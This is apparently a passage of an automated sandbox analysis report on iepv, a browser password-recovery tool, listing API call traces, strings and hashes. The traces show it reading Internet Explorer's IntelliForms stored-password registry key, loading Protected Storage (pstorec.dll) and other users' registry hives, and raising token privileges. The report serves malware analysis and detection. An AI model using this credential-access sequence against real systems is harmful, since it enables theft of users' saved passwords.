                                          • Part of subcall function 004044DF: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004025D1,00000002,?,?,?,00401C46,?), ref: 00404513
                                          • Part of subcall function 004044DF: free.MSVCRT ref: 0040451C
                                        • free.MSVCRT ref: 00404E0D
                                        • memcpy.MSVCRT(?,?,?), ref: 00404E31
                                        Yara matches
                                        Similarity
                                        • API ID: free$memcpy$mallocwcslen
                                        • String ID:
                                        • API String ID: 726966127-0

                                        Execution Graph

                                        Execution Coverage:11.5%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:8.9%
                                        Total number of Nodes:872
                                        Total number of Limit Nodes:27
5363 40539f 5354->5363 5357 401378 5359 40539f strncat 5357->5359 5358 40139a 5358->5000 5360 401382 GetProcAddress 5359->5360 5361 401393 FreeLibrary 5360->5361 5362 40138e 5360->5362 5361->5358 5362->5361 5364 4053ce 5363->5364 5365 401361 LoadLibraryA 5364->5365 5366 4053ac strncat 5364->5366 5365->5357 5365->5358 5366->5364 5368 4056de 2 API calls 5367->5368 5369 402be2 5368->5369 5370 4054ca 2 API calls 5369->5370 5371 402bea 5370->5371 5378 405ce2 strlen strlen 5371->5378 5375 402bf9 5376 402c0b 5375->5376 5382 402ad5 5375->5382 5376->5023 5379 405d02 _mbscat 5378->5379 5380 402bf1 5378->5380 5379->5380 5381 405759 GetFileAttributesA 5380->5381 5381->5375 5383 40639c 9 API calls 5382->5383 5384 402b0c 5383->5384 5385 4063f9 9 API calls 5384->5385 5394 402b17 5385->5394 5386 402b93 5387 406491 FindClose 5386->5387 5388 402b9e 5387->5388 5388->5376 5389 406361 2 API calls 5389->5394 5391 402b40 _strnicmp 5391->5394 5392 4063f9 9 API calls 5392->5394 5393 402ad5 102 API calls 5393->5394 5394->5386 5394->5389 5394->5391 5394->5392 5394->5393 5395 402a08 5394->5395 5410 405476 CreateFileA 5395->5410 5397 402a1c 5398 402a29 GetFileSize 5397->5398 5399 402acc 5397->5399 5400 402a42 ??2@YAPAXI 5398->5400 5401 402ac3 CloseHandle 5398->5401 5399->5394 5411 405c7e ReadFile 5400->5411 5401->5399 5403 402a58 5404 402abc ??3@YAXPAX 5403->5404 5405 402a5f memcmp 5403->5405 5404->5401 5406 402a86 5405->5406 5407 402a8d memcmp 5405->5407 5412 40326a 5406->5412 5407->5404 5407->5406 5410->5397 5411->5403 5413 402ab9 5412->5413 5414 403273 5412->5414 5413->5404 5416 403207 5414->5416 5417 403c66 80 API calls 5416->5417 5418 40323b 5417->5418 5419 403256 5418->5419 5420 4031b2 95 API calls 5418->5420 5419->5413 5421 40324b LocalFree 5420->5421 5421->5419 5425 40860f 5422->5425 5426 408656 ??3@YAXPAX 5422->5426 5425->5426 5427 4085a2 5425->5427 5426->4917 5428 4085cf 5427->5428 5430 4085b4 5427->5430 5431 404495 SendMessageA 5428->5431 5430->5425 5432 4044c3 5431->5432 5432->5430 
5433->4726 5434->4733 5436 408d03 5435->5436 5440 408cbf 5435->5440 5456 4054a8 strlen WriteFile 5436->5456 5438 408d11 5438->4734 5439 4054a8 strlen WriteFile 5439->5440 5440->5436 5440->5439 5442 409332 5441->5442 5449 409233 5441->5449 5457 4054a8 strlen WriteFile 5442->5457 5444 409340 5444->4740 5445 40925d strchr 5446 40926b strchr 5445->5446 5445->5449 5446->5449 5447 406115 7 API calls 5447->5449 5448 4054a8 strlen WriteFile 5448->5449 5449->5442 5449->5445 5449->5447 5449->5448 5450 4060d5 free 5449->5450 5450->5449 5452 405504 5451->5452 5453 4054fc GetLastError 5451->5453 5458 4053f1 5452->5458 5453->5452 5456->5438 5457->5444 5459 405425 FormatMessageA 5458->5459 5460 40540e LoadLibraryExA 5458->5460 5462 405463 _mbscpy 5459->5462 5463 40543e strlen 5459->5463 5460->5459 5461 405420 5460->5461 5461->5459 5466 405472 sprintf MessageBoxA 5462->5466 5464 405458 LocalFree 5463->5464 5465 40544b _mbscpy 5463->5465 5464->5466 5465->5464 5466->4737 5467->4767 5468->4769 5469->4771 4377 40ce24 FindResourceA 4378 40ce3d SizeofResource 4377->4378 4381 40ce67 4377->4381 4379 40ce4e LoadResource 4378->4379 4378->4381 4380 40ce5c LockResource 4379->4380 4379->4381 4380->4381 4383 40ceaa EnumResourceNamesA

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32(?), ref: 0040BFAF
                                          • Part of subcall function 0040BF6B: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0040BF81
                                        • GetLastError.KERNEL32(00000000), ref: 0040BFC1
                                        • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 0040BFE1
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 0040BFEF
                                        • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0040C015
                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 0040C026
                                        • GetLastError.KERNEL32(00000000), ref: 0040C028
                                        • CloseHandle.KERNELBASE(?), ref: 0040C033
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressProc$ErrorLast$AdjustCloseCurrentHandleLookupPrivilegePrivilegesProcessTokenValue
                                        • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA
                                        • API String ID: 2436455536-3194204137
                                        • Opcode ID: 4f6d9428a8150541444a387d4d71cb4677097e3ff327b2a2aefc8e3eb35eaedb
                                        • Instruction ID: 4a9456cab663dd16435ec649672564a535132417db7f97ed96ae019cfbe850c8
                                        • Opcode Fuzzy Hash: 4f6d9428a8150541444a387d4d71cb4677097e3ff327b2a2aefc8e3eb35eaedb
                                        • Instruction Fuzzy Hash: CA119E7250021AEBDB10ABE5CD899AE7AACEF04384F004436FA01F3291D778DD548BA8

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00405F72: free.MSVCRT ref: 00405F75
                                          • Part of subcall function 00405F72: free.MSVCRT ref: 00405F7D
                                        • RegOpenKeyExA.KERNELBASE(?,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00020019,?,00000000,?), ref: 00406BB4
                                          • Part of subcall function 0040609F: free.MSVCRT ref: 004060AE
                                        • memset.MSVCRT ref: 00406BF4
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 00406C1D
                                        • _strupr.MSVCRT ref: 00406C3B
                                          • Part of subcall function 00405F98: strlen.MSVCRT ref: 00405FA9
                                          • Part of subcall function 00405F98: free.MSVCRT ref: 00405FCC
                                          • Part of subcall function 00405F98: free.MSVCRT ref: 00405FEF
                                          • Part of subcall function 00405F98: memcpy.MSVCRT(00000002,004069FD,000000FF,?,00000001,00000000,?,00406058,00000000,00000000,004069FD), ref: 0040600F
                                        • memset.MSVCRT ref: 00406C81
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?,?,?,000000FF), ref: 00406CAC
                                        • RegCloseKey.ADVAPI32(?), ref: 00406CBD
                                        Strings
                                        • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00406BAE
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: free$EnumValuememset$CloseOpen_struprmemcpystrlen
                                        • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                        • API String ID: 2511307296-680441574
                                        • Opcode ID: 0b3aa524db69a8448af26164002a83135ebc79bddcf20ee1b12d273adf7cfa70
                                        • Instruction ID: 9e46696cd099a03c749b7fc8e4f1fd7132345e4112eec0b4d2b1eb9bd22262da
                                        • Opcode Fuzzy Hash: 0b3aa524db69a8448af26164002a83135ebc79bddcf20ee1b12d273adf7cfa70
                                        • Instruction Fuzzy Hash: A841F7B2D0011DAFDB10DF99DD82DEEBBBCEF08344F10406AB619F2191D674AA558FA4

                                        Control-flow Graph

                                        [Control-flow graph rendering omitted (Executed / Not Executed legend): basic blocks 4063f9-406490 with FindFirstFileA, FindNextFileA, strlen * 2, call 406491 and call 405918]
                                        APIs
                                        • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,00402B17,?,?,?,?), ref: 0040640F
                                        • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,00402B17,?,?,?,?), ref: 0040642D
                                        • strlen.MSVCRT ref: 0040645D
                                        • strlen.MSVCRT ref: 00406465
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FileFindstrlen$FirstNext
                                        • String ID:
                                        • API String ID: 379999529-0
                                        • Opcode ID: a2f68e0131ad00fe1563c1fc84e975f570fd1c3ea5ef582d6e09f883641bc239
                                        • Instruction ID: d61fbb18d3c70a5b6ff45dc066800e2bd6bd94eafa4c712f38055f66edc6061f
                                        • Opcode Fuzzy Hash: a2f68e0131ad00fe1563c1fc84e975f570fd1c3ea5ef582d6e09f883641bc239
                                        • Instruction Fuzzy Hash: 1B11CEB24042059FD3149B68D844ADFB3DCEB44329F214A3FF45AE31C0EB38A9508B69

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00403F00: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00403F1F
                                          • Part of subcall function 00403F00: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403F31
                                          • Part of subcall function 00403F00: FreeLibrary.KERNEL32(00000000), ref: 00403F45
                                          • Part of subcall function 00403F00: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403F70
                                        • SetErrorMode.KERNELBASE(00008001), ref: 0040B9A3
                                        • GetModuleHandleA.KERNEL32(00000000,0040CEAA,00000000), ref: 0040B9BC
                                        • EnumResourceTypesA.KERNEL32(00000000), ref: 0040B9C3
                                        • MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040B9E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: LibraryMessage$AddressEnumErrorFreeHandleLoadModeModuleProcResourceTypes
                                        • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\iepv
                                        • API String ID: 1684816736-3035498568
                                        • Opcode ID: fbde459b227d05bec624e71c6036b1af5cc34eaf2f79f08d0c38d15a99a88878
                                        • Instruction ID: d43f3b1e08da06549c2e0bf94a7206877e006fb5d6485bf630465df68f068d52
                                        • Opcode Fuzzy Hash: fbde459b227d05bec624e71c6036b1af5cc34eaf2f79f08d0c38d15a99a88878
                                        • Instruction Fuzzy Hash: A3515E71508346ABD720AF62DD49A5BBBACFF44344F400C3EF685B21A1D73898158BAE

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 00406F62
                                        • strlen.MSVCRT ref: 00406F71
                                        • strlen.MSVCRT ref: 00406F7F
                                        • RegLoadKeyA.ADVAPI32(80000002,$NIRSOFT_IEPV_KEY$,00000000), ref: 00406FC2
                                        • RegOpenKeyExA.ADVAPI32(80000002,$NIRSOFT_IEPV_KEY$,00000000,00020019,?), ref: 00406FDB
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800,?,00000104,00000000,?,?,004025EE,?,00000000), ref: 004070AD
                                        • _wcslwr.MSVCRT ref: 004070BA
                                        • wcslen.MSVCRT ref: 004070D7
                                        • RegCloseKey.ADVAPI32(?,?,00000104,00000000,?,?,004025EE,?,00000000), ref: 00407145
                                        • RegUnLoadKeyA.ADVAPI32(80000002,$NIRSOFT_IEPV_KEY$,?,00000104,00000000,?,?,004025EE,?,00000000), ref: 00407155
                                          • Part of subcall function 00405918: _mbscpy.MSVCRT(?,?,?,00403438,?,Application Data\Microsoft\Protect,?,?,?,00000000,00402C40,?), ref: 00405920
                                          • Part of subcall function 00405918: _mbscat.MSVCRT ref: 0040592F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Loadstrlen$ByteCharCloseMultiOpenWide_mbscat_mbscpy_wcslwrmemsetwcslen
                                        • String ID: $NIRSOFT_IEPV_KEY$$/$/$ntuser.dat
                                        • API String ID: 2025462591-835937672
                                        • Opcode ID: 37bd4403ce09373d63c1f516d04b7e43716adbd205a2cd39e1f06fcbdff7aa7e
                                        • Instruction ID: ead2737e8e6220596dc6ee0efdb618599277858d08f9b0aa3e170f90a4b6c739
                                        • Opcode Fuzzy Hash: 37bd4403ce09373d63c1f516d04b7e43716adbd205a2cd39e1f06fcbdff7aa7e
                                        • Instruction Fuzzy Hash: 47518671900118AACB14EF55CC85EDAB7B8EF44304F14447BFA0AFB192D778AE85CB99

                                        Control-flow Graph

                                        [Control-flow graph rendering omitted (Executed / Not Executed legend): basic blocks 40d4fc-40d6c1 with GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _initterm, __getmainargs, GetStartupInfoA, _cexit, exit and calls to 40d6e8, 408af3, 40d6d4, 40b97b and 40d721]
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                        • String ID:
                                        • API String ID: 3662548030-0
                                        • Opcode ID: 6df737577507be7e67fc6c5be6bf1cb133c8ccb648732551b8eced2d8bd4cc48
                                        • Instruction ID: 428b8c0729d8d1ad6d4a6f02f33f5e4280a30d90fc79a33d0819ea2038a00576
                                        • Opcode Fuzzy Hash: 6df737577507be7e67fc6c5be6bf1cb133c8ccb648732551b8eced2d8bd4cc48
                                        • Instruction Fuzzy Hash: 5A418B70C00254DFCB20AFE5D944AAD7BB4AB04314F24097BE555B72E1D7794886CF5D

                                        Control-flow Graph

                                        [Control-flow graph rendering omitted (Executed / Not Executed legend): basic blocks 40ae0f-40aef0 with memset, GetModuleFileNameA, strrchr, _mbscat, _mbscpy * 2 and calls to 401a30, 4017ea and 4082d1]
                                        APIs
                                        • memset.MSVCRT ref: 0040AE40
                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0040AE51
                                        • strrchr.MSVCRT ref: 0040AE60
                                        • _mbscat.MSVCRT ref: 0040AE7A
                                        • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AEAE
                                        • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AEBF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _mbscpy$FileModuleName_mbscatmemsetstrrchr
                                        • String ID: .cfg$General
                                        • API String ID: 556121754-1188829934
                                        • Opcode ID: 5137b276071cd748732b395deb669b979b0f3f0ad1264ed1abebc979dbc7320f
                                        • Instruction ID: 2e23dc87211df01c5a59ffa16cb291305880bb2efea795ae7a23b1e77d593d6d
                                        • Opcode Fuzzy Hash: 5137b276071cd748732b395deb669b979b0f3f0ad1264ed1abebc979dbc7320f
                                        • Instruction Fuzzy Hash: 7B2175769042185BDB21DBA5CC85BCA77AC9F54304F4400F6F548B71C2DAB85BC98BA9

                                        Control-flow Graph

                                        [Control-flow graph rendering omitted (Executed / Not Executed legend): basic blocks 402454-40269e with memset * 2, strlen * 2 and calls to 4058e3, 405f50, 405780, 405918, 406165, 406f24, 4060d5, 405ed3, 405f98, 405f72, 4065c1, 40269f, 402c18, 40337e, 40c8ba, 40c974 and 40c91f]
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$strlen$Version
                                        • String ID: ;$iepv_sites.txt
                                        • API String ID: 855378092-1428769095

                                        Control-flow Graph: function 0040CEF4 (graph image omitted)
                                        APIs
                                          • Part of subcall function 0040CEC5: LoadLibraryA.KERNEL32(shell32.dll,0040CF03), ref: 0040CED3
                                          • Part of subcall function 0040CEC5: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040CEE8
                                        • memset.MSVCRT ref: 0040CF32
                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,-k@), ref: 0040CF4E
                                        • RegCloseKey.ADVAPI32(?,?), ref: 0040CF75
                                        • _mbscpy.MSVCRT(00000000,?), ref: 0040CF84
                                          • Part of subcall function 004058E3: GetVersionExA.KERNEL32(00412058,?,00402475), ref: 004058FD
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressCloseLibraryLoadOpenProcVersion_mbscpymemset
                                        • String ID: -k@$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                        • API String ID: 3832957303-19275265

                                        Control-flow Graph: function 0040A274 (graph image omitted)
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Cursor_strcmpiqsort
                                        • String ID: /nosort$/sort
                                        • API String ID: 3665648111-1578091866

                                        Control-flow Graph: function 00418F70 (graph image omitted)
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd

                                        Control-flow Graph: function 0040B69D (graph image omitted)
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(0000022C,?,?,?,00000000,0040BA1D), ref: 0040B6BF
                                        • ??2@YAPAXI@Z.MSVCRT(000007AC,?,?,?,00000000,0040BA1D), ref: 0040B6E8
                                        • DeleteObject.GDI32(?), ref: 0040B73C
                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,00000000,0040BA1D), ref: 0040B764
                                        • LoadIconA.USER32(00000000,00000065), ref: 0040B76D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                        • String ID:
                                        • API String ID: 659443934-0

                                        Control-flow Graph: function 0040B81A (graph image omitted)
                                        APIs
                                        • _strcmpi.MSVCRT ref: 0040B88F
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000), ref: 0040B969
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??3@_strcmpi
                                        • String ID: /stext$bq@
                                        • API String ID: 3410402764-2864633008

                                        Control-flow Graph: function 0040C8BA (graph image omitted)
                                        APIs
                                          • Part of subcall function 0040C8A3: FreeLibrary.KERNELBASE(?,0040C8C6), ref: 0040C8AF
                                        • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 0040C8CB
                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040C8DE
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
